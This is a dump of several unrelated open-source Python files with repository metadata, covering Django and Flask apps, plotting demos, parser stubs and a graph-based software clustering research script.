913c44aa9b6797ec1bd2b9a40a0ac353e36481c9 | 68a2d5c4cfcf548dc689b7119bd66fe3ccfa7178 | /LogAnalyser/acuros_sap/exceptions.py | bdb4dc14874343b51f0f8ad4b451d8d311e34f3c | [] | no_license | sunghwanJo/ASAP-Log-Analyser | 21dce9db0d96751376d54041af517ebeb2a38c0a | 96cd7228dd9df15da361191decaeedbe7f451023 | refs/heads/master | 2020-12-24T23:38:54.829234 | 2012-10-01T19:55:45 | 2012-10-01T19:55:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | import inspect
class ASAPError(Exception):
def __init__ (self, message):
self.caller = inspect.stack()[2]
self.message = message
def __str__ (self):
return self.message
class UnsupportedRequestMethodError(ASAPError):
pass
class UnsupportedVersionError(ASAPError):
pass
class NoParameterError(ASAPError):
pass
class InvalidParameterError(ASAPError):
pass
class WrongFormatError(ASAPError):
pass
class NotAuthenticatedUserError(ASAPError):
pass
class InternalServerError(ASAPError):
pass
class IllegalStateError(ASAPError):
pass
class TimeExpiredError(ASAPError):
pass
| [
"acuros@MacBookAir"
] | acuros@MacBookAir |
6b418aade73b04779dc6fb50c19ad61dab4275ce | f423abe5f0e4d627dda7aa9cc6bfc8819ca62d1d | /py/bin/wheel | 38b044491d0b29aab03a4d310a9d628a9a174808 | [] | no_license | emiliowl/flask-nonsense-sample | 114fee7d13d285d6c2b9353d1438c6ad6bd1e46d | 229577416634723b866bab6de7a1b2daec29438e | refs/heads/master | 2021-07-24T04:50:07.102407 | 2020-03-22T12:57:53 | 2020-03-22T12:57:53 | 249,181,380 | 0 | 0 | null | 2021-03-20T03:06:50 | 2020-03-22T12:45:14 | Python | UTF-8 | Python | false | false | 242 | #!/Users/murta/Desktop/ro.flask/py/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"emilio.murta@msitbrasil.com"
] | emilio.murta@msitbrasil.com | |
daa219e526b593e94fe224b572c49d8ae958e6c8 | 544d724907670b1e38418f7220ba6693ffbbfebf | /Matplotlib/colorMapContour.py | 86f97581907e50ec7e6676e6d27da745edf38b21 | [
"MIT"
] | permissive | dominiceggerman/PythonWork | b977f220febe5fddaf657274e8353c8fad1ac90e | 1e4195842f93165cc4a54c98fa603f3b5eeb921e | refs/heads/master | 2020-03-22T01:19:45.917452 | 2019-01-28T16:44:58 | 2019-01-28T16:44:58 | 139,298,118 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Colormap and contour graph
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
if __name__ == "__main__":
# Data
m = np.linspace(0, np.pi, 100)
n = np.linspace(0, 2*np.pi, 100)
x, y = np.meshgrid(m, n)
z = x * y
# Figure
fig, ax = plt.subplots(1, 2, figsize=(12, 4))
# ColorMap
p = ax[0].pcolor(x, y, z, cmap=cm.RdBu, vmin=abs(z).min(), vmax=abs(z).max())
cb = fig.colorbar(p, ax=ax[0])
# Contour
cnt = ax[1].contour(z, cmap=cm.RdBu, vmin=abs(z).min(), vmax=abs(z).max(), extent=[0, 1, 0, 1])
# Show
plt.tight_layout()
plt.show() | [
"dominiceggerman@gmail.com"
] | dominiceggerman@gmail.com |
93aab3250554398df06b12f5c3edf83d0c55d790 | 7de73bcf5452209028459a908d4d5ebdb8cc3794 | /short_url/management/commands/update_db.py | 8697d5a2a936df37e764e04c4f07aaa3f42ec3d5 | [] | no_license | abhishekrana10/urlshortner | 51567e2481919d160c91463a8430c87614deae62 | 56779bdd703b37047936f947a589e8f4f434788c | refs/heads/master | 2020-03-08T11:01:35.626613 | 2018-06-07T14:30:04 | 2018-06-07T14:30:04 | 128,087,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,619 | py | from django.core.management.base import BaseCommand, CommandError
from django.db import models
from short_url.models import url_mapping, deleted_url, url_stats
import datetime
import time
class Command(BaseCommand):
help = 'Command to do........'
def add_argument(self, parser):
pass
def handle(self, *args, **options):
try:
time_up = datetime.datetime.today()
time_update = int(time.mktime(time_up.timetuple()))
query_set = url_mapping.objects.all()
stats_query = url_stats.objects.all()
stats_const = 1.0
for obj in query_set:
time_added=int(obj.added)
print(time_added)
timediff=float((time_update-time_added)/2592000)
print(timediff)
ttl_month=float(obj.ttl)
if obj.ttl==-1:
pass
elif timediff > ttl_month:
#entry=url_mapping.objects.get(short_url=obj.short_url)
deleted_url_instance = deleted_url(deleted_entry=obj.short_url)
deleted_url_instance.save()
url_mapping.objects.filter(short_url=obj.short_url).delete()
for code_obj in stats_query:
hit_time = int (code_obj.hit_time)
print(hit_time)
del_time = float((time_update-hit_time)/2592000)
if del_time > stats_const:
url_stats.objects.filter(short_url=code_obj.short_url).delete()
except Exception as e:
CommandError(repr(e)) | [
"ar10695@gmail.com"
] | ar10695@gmail.com |
94aacbf9a71ea41a6ccdc6b32c67f82aa1c6740b | d73f90f10cbf06d10b7ee0803c00919eca28f7d9 | /Skoarcery/pymp/skoarmantics.py | 0608ac622688db2671be56e430366141e1563da5 | [
"Artistic-2.0"
] | permissive | rmg/Skoarcery | 80a72e46cba038780e6c51a47233608ac9ddc2a4 | 69efc07c7d2e0d742674e63c6626bc3d075b7af6 | refs/heads/master | 2020-04-10T08:31:52.339287 | 2014-07-24T22:27:56 | 2014-07-24T22:27:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,005 | py | # ============
# Skoarmantics
# ============
#
# We went depth first so our children should be defined
#
def msg_chain_node(skoar, noad):
pass
def beat(skoar, noad):
noad.absorb_toke()
noad.beat = noad.toke
noad.is_beat = True
def meter_beat(skoar, noad):
noad.absorb_toke()
noad.beat = noad.toke
def listy(skoar, noad):
from Skoarcery.pymp.lex import Toke_ListSep
X = []
for x in noad.children[1:-1]:
if x.toke and isinstance(x.toke, Toke_ListSep):
continue
X.append(x)
noad.replace_children(X)
def clef(skoar, noad):
pass
def meter_symbolic(skoar, noad):
pass
def stmt(skoar, noad):
pass
def musical_keyword_misc(skoar, noad):
pass
def coda(skoar, noad):
pass
def meter_ass(skoar, noad):
pass
def assignment(skoar, noad):
pass
def accidentally(skoar, noad):
pass
def boolean(skoar, noad):
pass
def ottavas(skoar, noad):
pass
def skoaroid(skoar, noad):
pass
def msg(skoar, noad):
pass
def dal_goto(skoar, noad):
pass
def cthulhu(skoar, noad):
pass
def dynamic(skoar, noad):
pass
def optional_carrots(skoar, noad):
pass
def meter_sig_prime(skoar, noad):
pass
def meter(skoar, noad):
# trim start and end tokens
noad.replace_children(noad.children[1:-1])
def marker(skoar, noad):
from Skoarcery.pymp.lex import Toke_Bars
noad.absorb_toke()
skoar.add_marker(noad)
toke = noad.toke
if isinstance(toke, Toke_Bars):
if toke.pre_repeat > 0:
noad.performer = (lambda x: x.jmp_colon(noad))
def noaty(skoar, noad):
pass
def noat_literal(skoar, noad):
from Skoarcery.pymp.lex import Toke_NamedNoat
noat = noad.absorb_toke()
noad.noat = noat
if isinstance(noat, Toke_NamedNoat):
noad.performer = (lambda x: x.noat_go(noat))
def noat_reference(skoar, noad):
# TODO Symbol | CurNoat | listy
pass
def pedally(skoar, noad):
pass
| [
"lucas@neoboolean.com"
] | lucas@neoboolean.com |
7529046e65fc24965ea205d3d721b755821fce1b | 1877971a590e9748a909768e21c458bcf9e73dcd | /utils/data_generate/__init__.py | 01176292c204efbaaeed9efd1dd0ff039fbaf716 | [] | no_license | zhoukaii/RankIQA.PyTorch | 805ad67fcf81ecafbcc2108269957da47a4c13ab | fad8c07d7b45e59b1384cdb0a31724a395ee3a86 | refs/heads/master | 2023-03-17T04:14:40.390159 | 2020-06-20T18:04:19 | 2020-06-20T18:04:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | # -*- coding: utf-8 -*-
""" 数据集生成 """
| [
"guanliang.zyw@alibaba-inc.com"
] | guanliang.zyw@alibaba-inc.com |
3c24d1ccc752ace27c95fbd46e301893a6ab785a | 984e5e8da4e1324b68178678ed934b83ff891500 | /GMADC.py | 4330413a22d21fc4c36a8e14fc667e58d3769b23 | [
"MIT"
] | permissive | mablue/GMADC | d1dc701af31dde7034db2bc04ba674e4716bb30b | bf4ab9123cc90ad0d8cf0b9ffe56c5492d4c250d | refs/heads/main | 2023-07-14T14:56:33.200944 | 2021-08-29T22:33:48 | 2021-08-29T22:33:48 | 401,150,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,727 | py | #=============================================================================#
# GMADC Algorythm(Its main file to run) #
# To solve random choise on disconected Softwere class graps. #
# By: Masoud Azizi Email: mablue92@gmail.com #
#=============================================================================#
import ntpath
import os
import random
import subprocess
import time
import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
# from matplotlib import pyplot as plt
from numpy import inf
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import shortest_path
# from progress.bar import Bar
# for drawing plot
from callgraph import CallGraph
#My text mining algorithm to classify disconnected classes in GMA
from GMADCC import GMADisconnectedClassClassifier as gmadc
newGmadc=None
# To prevent from loops in chain that will make by text similarity
disconnectedClassesIndex=list()
# disSimList: disconnected classes+Similar Classes that obtained form GMADCC (ex: disSimList=[[3,4],[1,3],[0,2]])
disSimList=list()
# disconnected classes index list
dccil = list()
dcSim=list()
dcAndSim = list()
filePaths=None
# search in 2d arrays by value
def index_2d(data, search):
for i, e in enumerate(data):
try:
return i, e.index(search)
except ValueError:
pass
raise ValueError("{} is not in list".format(repr(search)))
# create Similarity Matrix
def createSimilarityMatrix(shortestCallMatrix):
# print("createSimilarityMatrix(shortestCallMatrix)")
tempMatrix = [[0 for i in range (len (shortestCallMatrix))] for i in range (len (shortestCallMatrix))]
v = len (tempMatrix)
maximum = -1
for i in range(0,v):
max_temp = max(shortestCallMatrix[i])
if maximum < max_temp:
maximum = max_temp
if maximum == 0:
print("all classes are in its own cluster!")
exit()
for i in range (0, v):
for j in range (0, v):
if shortestCallMatrix[i][j] == 0 and i !=j:
tempMatrix[i][j] = maximum
else:
tempMatrix[i][j] = shortestCallMatrix[i][j]
for i in range (0,v):
for j in range (0, v):
tempMatrix[i][j] = 1 - tempMatrix[i][j]/maximum
return tempMatrix
# Initializing
def initializing(k , n, similarityMatrix):
# print("initializing")
centers = generateRandomCenter(k, n)
#print(centers)
clusters = fillClustersBasedOnCenter(k, n, similarityMatrix, centers)
return clusters
# Fill Clusters Based On Center
def fillClustersBasedOnCenter(k, n, similarityMatrix, centers):
# print("fillClustersBasedOnCenter(k, n, similarityMatrix, centers)")
disconnectedClassesIndex=list()
for i in range(n): # initialize base step, center of a cluster remains in index 0 of each list
index = 0
clusterNumber = centers[0][0]
maxSimilarity = similarityMatrix[i][clusterNumber]
for j in range(1,k):
clusterNumber = centers[j][0]
###################################################
#############, (#####################
######### #################
######. *#%#, %##############
####/ %############### #############
### ##################### ###########
## ######################### ##########
#& ##########################. ##########
# ########################### ##########
#, ########################### &#########
## ######################### ##########
##& ####################### ###########
#### ################### ############
##### ############* ###########
######## /########
########### # ######
################# ######### ,###
###################################### #
######################################## #
########################################### ####
###################################################
if maxSimilarity < similarityMatrix[i][clusterNumber]:
maxSimilarity = similarityMatrix[i][clusterNumber]
index = j
# print("<",i,j)
# Place that we reach to a disconnected class and MA_MS algo starts his text mining calculation to find a
# similarity between other classes and make a chain with other clusters and disconnected classes
elif maxSimilarity == similarityMatrix[i][clusterNumber] and j==1:
# disconnectedClassesIndex.append(i)
# if disconnectedClassesIndex.count(i)==2:
if i not in dccil:
dccil.append(i)
dcAndSim.append([i,i])
# print(dccil)
# print(dccil)
# print(clusterNumber)
# disconnectedClassesIndex.append(i)
# if disconnectedClassesIndex.count(i)==2:
# print("---------------------------------------------")
# dcsi = newGmadc.getDisconnectedClassCenter(disconnectedClassesIndex,filePaths,clusterNumber)
# if disSimList.count((i,dcsi))<1:
# disSimList.append((i,dcsi))
# print(disconnectedClassesIndex)
# pass
# elif maxSimilarity > similarityMatrix[i][clusterNumber]:
# print(">",i,j)
# pass
# print("filePath(i={},j={})={},MaxSim={},SimMat[{}][{}]={}".format(i,j,filePaths[i],maxSimilarity,i,clusterNumber,similarityMatrix[i][clusterNumber]))
temp = []
temp = centers[index]
if i != temp[0]:
temp.append(i)
centers.pop(index)
centers.insert(index,temp)
# print("i:", i, "index:", index, "sim:", maxSimilarity, "centers:", centers)
return centers
# Generate Random Center
def generateRandomCenter(k, n):
# print("generateRandomCenter(k, n)")
clusters = []
center = random.sample(range(n), k) #create k random center of k-means
#print(center)
for j in range(k): #transform k centers to 2 dimentionals array
c = center.pop(0)
clusters.append([c])
del(center)
#print(clusters)
return clusters
# Copy
def copy(matrix):
# print("copy(matrix)")
l = len(matrix)
temp = []
for i in range(0,l):
temp.append([])
m = len(matrix[i])
for j in range(0,m):
temp[i].append(matrix[i][j])
return temp
# Correct Center
def correctCenter(clusters, similarityMatrix):
# print("correctCenter(clusters, similarityMatrix)")
clustersUpdateCenter = []
for centerIndex in range(k):
clustersBackup = copy(clusters)
popedCluster = clustersBackup.pop(centerIndex)
# print("popedCluster:", popedCluster)
sameSimIndex = [0]
maxSimilarity = 0
for i in range(0, len(popedCluster)):
popedClusterSimilaritySum = 0
for j in range(0, len(popedCluster)):
popedClusterSimilaritySum = popedClusterSimilaritySum + similarityMatrix[popedCluster[i]][popedCluster[j]]
# print(popedCluster[i], ":" , popedClusterSimilaritySum)
if popedClusterSimilaritySum > maxSimilarity:
maxSimilarity = popedClusterSimilaritySum
sameSimIndex.clear()
sameSimIndex.append(i)
elif popedClusterSimilaritySum == maxSimilarity:
sameSimIndex.append(i)
# print(i)
# print(sameSimIndex)
# print("sameSimIndex: ", sameSimIndex, "maxSimilarity: ",maxSimilarity)
if len(sameSimIndex) == 1:
val = popedCluster[sameSimIndex[0]]
# print(popedCluster)
popedCluster.remove(val)
# print(popedCluster)
popedCluster.insert(0, val)
# print(popedCluster)
clustersUpdateCenter.append(popedCluster)
# print("OK, clustersUpdateCenter: ",clustersUpdateCenter,"\n")
elif len(sameSimIndex) > 1:
tempMinOtherSim = n
for i in range(len(sameSimIndex)):
sumOtherSimilarity = 0
val = popedCluster[sameSimIndex[i]]
for j in range(k-1):
for m in range(len(clustersBackup[j])):
sumOtherSimilarity = sumOtherSimilarity + similarityMatrix[val][clustersBackup[j][m]]
# print("val:" ,val, "sumOtherSimilarity:",sumOtherSimilarity)
if tempMinOtherSim > sumOtherSimilarity:
tempMinOtherSim = sumOtherSimilarity
tempVal = val
# print("tempVal:", tempVal)
popedCluster.remove(tempVal)
popedCluster.insert(0, tempVal)
clustersUpdateCenter.append(popedCluster)
# print("NOK, clustersUpdateCenter: ",clustersUpdateCenter,"\n")
return clustersUpdateCenter
# Compute Similarity Function
def computeSimilarityFunction(matrix , similarityMatrix):#sum of similarity of all clusters
# print("computeSimilarityFunction(matrix , similarityMatrix)")
function = 0
for i in range(k):
for j in range(1, len(matrix[i])):
function = function + similarityMatrix[matrix[i][0]][matrix[i][j]]
return function
# Clustering
def clustering(k, n, similarityMatrix, clustersUpdateCenter):
# print("clustering(k, n, similarityMatrix, clustersUpdateCenter)")
clusterOld = copy(clustersUpdateCenter)
iteration = 0
flag = 0
while iteration <1000 and flag < 5:
iteration = iteration + 1
clusterNew = []
# print("old:", id(clusterOld), "new:", id(clusterNew) , "d:", id(clusterOld)-id(clusterNew),"\n")
for i in range(k):
clusterNew.append([clusterOld[i][0]])
# print(centerUpdate)
clusterNew = fillClustersBasedOnCenter(k, n, similarityMatrix, clusterNew)
# print("clusterNew: ",clusterNew)
# similarityFunctionUpdate = computeSimilarityFunction(clusterNew, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate,"\n")
clusterNew = correctCenter(clusterNew, similarityMatrix)
# print("clustersUpdateCenter: ",clusterNew)
# similarityFunctionUpdate = computeSimilarityFunction(clusterNew, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate,"\n")
# check for continuing
tempNew = copy(clusterNew)
tempOld = copy(clusterOld)
# print(id(tempNew),id(tempOld),id(clusterNew),id(clusterOld))
for i in range(len(tempNew)):
tempNew[i].sort()
tempNew.sort()
# print("Sorted New: ", tempNew)
for i in range(len(tempOld)):
tempOld[i].sort()
tempOld.sort()
# print("Sorted Old: ", tempOld)
# print()
if(tempNew == tempOld):
flag = flag + 1
del(tempNew)
del(tempOld)
clusterOld = copy(clusterNew)
return clusterNew
# Unused
# Exporting To MoJo Format Algorithm Manual
def exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal):
# print("exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal)")
for i in range(k):
clustersFinal[i].sort()
clustersFinal.sort()
f1 = open ("MoJoAlgorithmManual.txt", "w")
for centerIndex in range(k):
for i in range(len(clustersFinal[centerIndex])):
f1.write("contain ")
f1.write("hulu")
f1.write(str(centerIndex))
f1.write(" ")
f1.write(str(clustersFinal[centerIndex][i]))
f1.write("\n")
f1.close()
# exportingToMoJoFormatExpert
def exportingToMoJoFormatExpert(fileNames, filePathNames, folderPathResult):
# print("exportingToMoJoFormatExpert(fileNames, filePathNames, folderPathResult)")
temp = []
for i in range(len(fileNames)):
# temp[i][1] = fileNames[i]
indexCluster = findInTofilePtheNames (fileNames[i], filePathNames)
if indexCluster == -1:
print("Cluster Conflict class ", fileNames[i])
return
# temp[i][0] = filePathNames[indexCluster][0]
temp.append([filePathNames[indexCluster][0], fileNames[i]])
temp.sort()
f1 = open (folderPathResult + "/MoJoExpert.txt", "w")
for i in range(len(fileNames)):
f1.write("contain ")
f1.write(temp[i][0])
f1.write(" ")
f1.write(temp[i][1])
f1.write("\n")
f1.close()
del(temp)
# findInTofilePtheNames
def findInTofilePtheNames (className, filePathNames):
# print("findInTofilePtheNames (className, filePathNames)")
index = -1
for i in range(len(filePathNames)):
if className == filePathNames[i][1] or className == filePathNames[i][2]:
if index == -1:
index = i
else:
return -1
return index
# findInTofilePtheNames
def exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, folderPathResult):
# print("exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, folderPathResult)")
f1 = open (folderPathResult + "/MoJoAlgorithm" + str(k) + "_" + str(run_no) + ".txt" , "w")
for centerIndex in range(k):
for i in range(len(clustersFinal[centerIndex])):
f1.write("contain ")
f1.write("hulu")
f1.write(str(centerIndex))
f1.write(" ")
f1.write(fileNames[clustersFinal[centerIndex][i]])
f1.write("\n")
f1.close()
# Start
cvsFilePathString = []
pathResultString = []
# print("for root, dirs, files in os.walk(\"CaseStudies\")")
for root, dirs, files in os.walk("CaseStudies"):
for file in files:
if file.endswith(('.csv')):
cvsFilePath=os.path.join(root, file)
cvsFilePathString.append(cvsFilePath)
resultPath = os.path.join(root,"../result",file)
pathResultString.append(resultPath)
if not os.path.isdir(resultPath):
os.makedirs(resultPath)
# print("for i in range (len(pathResultString))")
for i in range (len(pathResultString)):
if not os.path.isdir(pathResultString[i]):
os.mkdir(pathResultString[i])
# print("for cvsFileNumber in range (0,len(cvsFilePathString))")
for cvsFileNumber in range (0,len(cvsFilePathString)):
dcSim=list()
cvsFp=cvsFilePathString[cvsFileNumber]
df = pd.read_csv(cvsFp)
df.fillna(0, inplace = True)
sourceCodeFp="SourceCodes/{}.src/".format(ntpath.basename(cvsFp)[0:-4])
filePaths= [sourceCodeFp+n for n in list(df.columns.values[1:])]
newGmadc = gmadc(filePaths)
fileDirs=["'{}'".format(os.path.dirname(path)).replace(" ","%20") for path in filePaths]
fileNames=list(["'{}'".format(ntpath.basename(path)) for path in filePaths])
fileExts=list([os.path.splitext(name)[1] for name in fileNames])
df.drop(df.columns[0], axis=1, inplace=True)
cdgNonSquer=df.to_numpy()
cdgNonSquerMaxLen=max(len(cdgNonSquer[0,:]),len(cdgNonSquer[:,0]))
# print(cdgNonSquerMaxLen,len(cdgNonSquer[0,:]),len(cdgNonSquer[:,0]))
cdgNonSymetric=np.resize(cdgNonSquer,(cdgNonSquerMaxLen,cdgNonSquerMaxLen))
SymetricCDG = np.maximum( cdgNonSymetric, cdgNonSymetric.transpose() )
# print("SymetricCDG\n",SymetricCDG)
timeInit = 0
timeClustering = 0
timeTotal = 0
filePathNames = [[fileDirs[i],fileNames[i],fileNames[i]] for i in range(len(fileNames))]
# print(np.corrcoef(callMatrix))
# print(filePathNames)
print(cvsFilePathString[cvsFileNumber]+":\tinput files completed :)")
exportingToMoJoFormatExpert(fileNames, filePathNames, pathResultString[cvsFileNumber])
print(cvsFilePathString[cvsFileNumber]+":\texporting to MoJo format for expert completed :)")
time1 = time.time()
time2 = time.time()
timeInit = time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tgenerating call matrix to symmetric completed :)")
csrCDG = csr_matrix(SymetricCDG)
# print("csrCDG\n", csrCDG)
#############
##########
##########
############
####### ##
## ####### ##
###### ####### #####
########### ####### #######
######## ####### ####### ########
####### ########## ## ########
##### ### ##### ##### ########
###### ### # ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
####### ####### ####### ########
# to draw the plot
cg = CallGraph(csrCDG )
cg.draw()
dist_matrix = shortest_path(csgraph=csrCDG,method='FW')# FW: floydwarshal
dist_matrix[dist_matrix == inf] = 0
# print(dist_matrix)
# Similarity Matrix Calculation
similarityMatrix = cosine_similarity(dist_matrix)
# print("for i in range(len(similarityMatrix))")
for i in range(len(similarityMatrix)):
similarityMatrix[i][i]=1
# np.savetxt('cosine_similarity.csv', similarityMatrix, delimiter=',', fmt='%s')
# print("simMtx\n",similarityMatrix)
# similarityMatrix = createSimilarityMatrix(dist_matrix)
time1 = time.time()
time2 = time.time()
timeInit = timeInit + time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tcalculating shortest path matrix completed :)")
time1 = time.time()
# similarityMatrix = createSimilarityMatrix(dist_matrix)
# np.savetxt('createSimilarityMatrix.csv', similarityMatrix, delimiter=',', fmt='%s')
# print(np.array(similarityMatrix))
time2 = time.time()
timeInit = timeInit + time2 - time1
print(cvsFilePathString[cvsFileNumber]+":\tforming similarity completed :)")
# print(similarityMatrix)
n = len(SymetricCDG) # number of elements
result = []
maxRunNo = 1 # default: maxRunNo = 30
maxK = 3 # default:
maxK = int(min(int(n/3), 100))
# bar = Bar('Processing', max=maxK*maxRunNo)
# Mohem
# print("for run_no in range (1,maxRunNo+1)")
for run_no in range (1,maxRunNo+1):
# print("for k in range (2,maxK + 1)")
for k in range (2,maxK + 1):
print("Progress: {}/{},{}/{},{}/{} ".format(cvsFileNumber,len(cvsFilePathString),run_no,(maxRunNo),k,(maxK)))
# bar.next()
time1 = time.time()
clustersInit = initializing(k , n, similarityMatrix)
# print("After initializing:\nclusters: ",clustersInit)
# print("initializing culsters completed :)")
# similarityFunction = computeSimilarityFunction(clustersInit, similarityMatrix)
# print("similarityFunction:",similarityFunction,"\n")
clustersUpdateCenter = correctCenter(clustersInit, similarityMatrix)
# print("clustersUpdateCenter: ",clustersUpdateCenter)
# similarityFunctionUpdate = computeSimilarityFunction(clustersUpdateCenter, similarityMatrix)
# print("similarityFunctionUpdate: ",similarityFunctionUpdate)
clustersFinal = clustering(k, n, similarityMatrix, clustersUpdateCenter)
#####################################, ############
##################################### &########
##################################### .#####
#, ###########( ##
#, ###### #
#############( .## ,###### %####
### ###### ##. ,& *######## ########
# *########## &## # ########## %###########
# ############ ###( %#########################
# *###& .#### &## # ##########&%############
### ###### ##, # ######### #########
############## .## ####### &#####
#, ###### *##
#, ########### #
##################################### ####
##################################### &#######
##################################### .###########
# print("1.clustersFinal\n",len(clustersFinal),clustersFinal)
if len(dcSim)==0:
for dc in range(len(dccil)):
sim = 0
for cl in range(n):
if newGmadc.getSim(dc,cl)>sim: # and dccil[dc]!=cl:
sim = newGmadc.getSim(dccil[dc],cl)
if len(dcSim)>dc:
dcSim[dc]=cl
else:
dcSim.append(cl)
# print(dcSim)
# print(clustersFinal)
for dc in range(min(len(dcSim), len(dccil))):
DCposition = index_2d(clustersFinal, dccil[dc])
# print("dc: ",dc,"\nlen(dccil): ",len(dccil),"\nlen(dcSim): ",len(dcSim))
DSposition = index_2d(clustersFinal, dcSim[dc])
clustersFinal[DSposition[0]].append(clustersFinal[DCposition[0]].pop(DCposition[1]))
print(" {}({})\t-->\t{}({})\t(Disconnected class: {},\tmoved to cluster of it's must similar class: {})" \
.format(DCposition[0],dccil[dc],
DSposition[0],dcSim[dc],
fileNames[dccil[dc]],
fileNames[dcSim[dc]]
))
dccil=list()
###################################################
time2 = time.time()
timeClustering = time2 - time1
timeTotal = timeInit + timeClustering
# i disabled it
# print(cvsFilePathString[cvsFileNumber]+ ":\tclustering completed at k = " + str(k)+ " and in run = " + str(run_no) + " :)")
# exportingToMoJoFormatAlgorithmManual(k, n, clustersFinal)
# print("exporting to MoJo format algorithm manually completed :)")
exportingToMoJoFormatAlgorithm(k, n, clustersFinal, fileNames, filePathNames, run_no, pathResultString[cvsFileNumber])
# print("exporting to MoJo format algorithm completed :)")
MoJoAlgorithmPath ="{}/MoJoAlgorithm{}_{}.txt".format(pathResultString[cvsFileNumber],k,run_no)
MoJoExpertPath= "{}/MoJoExpert.txt".format(pathResultString[cvsFileNumber])
# print(run_no,k,cvsFileNumber,MoJoAlgorithmPath,MoJoExpertPath)
proc = subprocess.Popen(["java", "mojo/MoJo", MoJoAlgorithmPath , MoJoExpertPath], stdout=subprocess.PIPE)
outs, errs = proc.communicate()
mojoMeasure = int(outs[:-1])
proc = subprocess.Popen(["java", "mojo/MoJo", MoJoAlgorithmPath , MoJoExpertPath,"-fm"], stdout=subprocess.PIPE)
outs, errs = proc.communicate()
mojoFmMeasure = float(outs[:-1])
# print(mojoFmMeasure)
result.append([run_no,k,mojoMeasure,mojoFmMeasure,timeInit,timeClustering,timeTotal])
# print(result)
# bar.finish()
outputFileResult = open (pathResultString[cvsFileNumber] + "/result.txt", "w")
outputFileResult.write("RunNO\tK\tMoJo\tMoJo fm\tTime Init\tTime Clustering\tTime Total\n")
# print("outputFileResult")
mj,mjfm=list(),list()
for i in range (0, maxRunNo * (maxK-1)):
outputFileResult.write(
"{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(
result[i][0],
result[i][1],
result[i][2],
result[i][3],
result[i][4],
result[i][5],
result[i][6]
))
mjfm.append(result[i][3])
mj.append(result[i][2])
outputFileResult.close()
print("min(mj): ",min(mj))
print("max(mjfm): ",max(mjfm))
outputFileResult.close()
del fileNames
del filePathNames
del cdgNonSymetric
del SymetricCDG
del similarityMatrix
del dist_matrix
del clustersFinal
del clustersInit
del clustersUpdateCenter
| [
"mablue92@gmail.com"
] | mablue92@gmail.com |
bf7948052fb1e2aecca90f904a6ed0cba3fbc785 | eebe77c4ff02edb670f7877460278002d81b4b2a | /api/app.py | df74bb00d3423fa0e568102378608c2ac0da497e | [
"MIT"
] | permissive | dinabandhub-Aira/FREQUENT_OPIATE_PRESCRIBER | 09fe2130c68a532190e2c67a55d5e9ccabe9ba24 | 3a434be2b15a987301bf165a6978c6fe24ad43d5 | refs/heads/master | 2023-08-10T23:12:28.815501 | 2021-10-02T05:46:03 | 2021-10-02T05:46:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | from flask import Flask, render_template, request, jsonify
from package_fop.predict import make_prediction
from package_fop import config
import pandas as pd
import joblib
import sys
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def front_end():
return render_template('home.html')
@app.route('/pred', methods=['GET', 'POST'])
def test():
j_data = request.get_json()
df = pd.read_json(j_data)
# data management
X_test, y_test = df.drop(config.TARGET,axis=1), df[config.TARGET]
# pred
y_pred = make_prediction(X_test)
# printing to console in the server console
# print(y_pred, file=sys.stdout)
return {'Actual':str(y_test.values.reshape(-1,)),'Pred':str(y_pred)}
if __name__ == '__main__':
app.run(debug=True)
| [
"beheradinabandhu50@gmail.com"
] | beheradinabandhu50@gmail.com |
59dac134825f1c2f542c184ecdfcc74551ff5f29 | 69af4476736dfc16dd8214c1fef49377c60ba73b | /motorcontroller/apps.py | abaaaefb1c38e8b3d7420eacfc952570a5361506 | [] | no_license | abdulhalim-cu/learn_django_by_example | 08304f0babb80428ef3cc0dc497ddf3c3b59921c | dacc2d3fd129b1b88ae685a6f1b46dfc6e5c8735 | refs/heads/master | 2021-01-16T18:07:09.642689 | 2017-08-26T08:56:21 | 2017-08-26T08:56:21 | 100,036,868 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django.apps import AppConfig
class MotorcontrollerConfig(AppConfig):
name = 'motorcontroller'
| [
"abdulhalim.cu10@gmail.com"
] | abdulhalim.cu10@gmail.com |
9a116f813c39f9c6e3b1f119c34e0d3b08336041 | 5c74051ddb66b7bebd5807c978575977bff84cd3 | /numpy/numpy_3.py | 5980223d231071a1bcacc908dc119cd06640f191 | [] | no_license | cuppar/numpy_test | 762e846c23199aa6b492ff5785385fe6755384bd | 17480f5a27479b85dbdcd67fad0073b2ae24ad56 | refs/heads/master | 2021-08-07T04:20:02.446972 | 2017-11-07T14:04:42 | 2017-11-07T14:04:42 | 109,843,302 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | #可看做扩展Python的list
import numpy as np
#画图工具
import matplotlib.pyplot as plt
#随机生成一个30*30的[0,1)的随机数表
image = np.random.rand(30, 30)
#把该数表显示为一个热量图
plt.imshow(image, cmap=plt.cm.rainbow)
#显示热力指示条
plt.colorbar()
#显示画布
plt.show()
| [
"cuppar.hzy@gmail.com"
] | cuppar.hzy@gmail.com |
